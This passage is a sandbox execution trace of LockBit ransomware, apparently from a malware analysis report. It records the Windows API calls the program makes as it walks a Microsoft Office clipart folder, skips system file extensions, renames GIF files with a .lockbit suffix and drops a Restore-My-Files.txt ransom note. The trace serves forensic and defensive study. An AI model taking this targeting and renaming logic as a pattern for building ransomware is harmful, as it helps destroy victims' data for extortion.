(lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.539] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.539] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.539] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF.lockbit") returned 85 [0185.540] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02134_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0185.541] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.541] malloc (_Size=0x40068) returned 0x1ff1e60 [0185.541] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2431) returned 1 [0185.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0185.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0185.542] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.547] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.547] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.549] free (_Block=0x1fa2ed8) [0185.549] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.549] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.549] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.549] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x579, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02187_.GIF", cAlternateFileName="")) returned 1 [0185.549] lstrcmpiW (lpString1=".", lpString2="WB02187_.GIF") returned -1 [0185.549] lstrcmpiW (lpString1="..", lpString2="WB02187_.GIF") returned -1 [0185.549] PathFindExtensionW (pszPath="WB02187_.GIF") returned=".GIF" [0185.549] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.549] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.549] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.549] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.549] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.549] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0185.549] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.549] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.550] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.550] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.550] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.550] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.550] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.550] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.550] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.550] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.550] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.551] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.551] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02187_.GIF") returned -1 [0185.551] lstrcmpiW (lpString1="ntldr", lpString2="WB02187_.GIF") returned -1 [0185.551] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02187_.GIF") returned -1 [0185.551] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02187_.GIF") returned -1 [0185.551] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02187_.GIF") returned -1 [0185.551] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02187_.GIF") returned -1 [0185.552] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02187_.GIF") returned -1 [0185.552] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.552] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF") returned=".GIF" [0185.552] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.552] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.552] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.552] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.553] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.553] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF.lockbit") returned 85 [0185.553] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02187_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0185.555] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.555] malloc (_Size=0x40068) returned 0x3d70450 [0185.555] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1401) returned 1 [0185.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0185.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0185.556] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0185.561] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.561] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.561] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.562] free (_Block=0x1fa2ed8) [0185.562] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.562] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.563] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x4abc, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02198_.GIF", cAlternateFileName="")) returned 1 [0185.563] lstrcmpiW (lpString1=".", lpString2="WB02198_.GIF") returned -1 [0185.563] lstrcmpiW (lpString1="..", lpString2="WB02198_.GIF") returned -1 [0185.563] PathFindExtensionW (pszPath="WB02198_.GIF") returned=".GIF" [0185.563] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.563] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.563] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.563] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.563] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.563] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0185.563] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.563] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.563] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.563] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.563] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.563] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.563] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.563] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.564] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.564] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.564] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.564] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.564] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.564] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.565] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.565] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02198_.GIF") returned -1 [0185.565] lstrcmpiW (lpString1="ntldr", lpString2="WB02198_.GIF") returned -1 [0185.565] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02198_.GIF") returned -1 [0185.565] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02198_.GIF") returned -1 [0185.565] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02198_.GIF") returned -1 [0185.565] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02198_.GIF") returned -1 [0185.565] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02198_.GIF") returned -1 [0185.565] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.565] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF") returned=".GIF" [0185.565] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.566] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.566] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.567] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.567] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.567] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.567] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.567] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.567] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF.lockbit") returned 85 [0185.567] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02198_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0185.569] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.569] malloc (_Size=0x40068) returned 0x3e70008 [0185.569] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=19132) returned 1 [0185.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0185.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0185.570] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0185.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.575] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.575] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.579] free (_Block=0x1fa2ed8) [0185.579] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.579] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.579] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.580] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1653, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02201_.GIF", cAlternateFileName="")) returned 1 [0185.580] lstrcmpiW (lpString1=".", lpString2="WB02201_.GIF") returned -1 [0185.580] lstrcmpiW (lpString1="..", lpString2="WB02201_.GIF") returned -1 [0185.580] PathFindExtensionW (pszPath="WB02201_.GIF") returned=".GIF" [0185.580] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.580] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.580] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.580] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.580] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.580] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 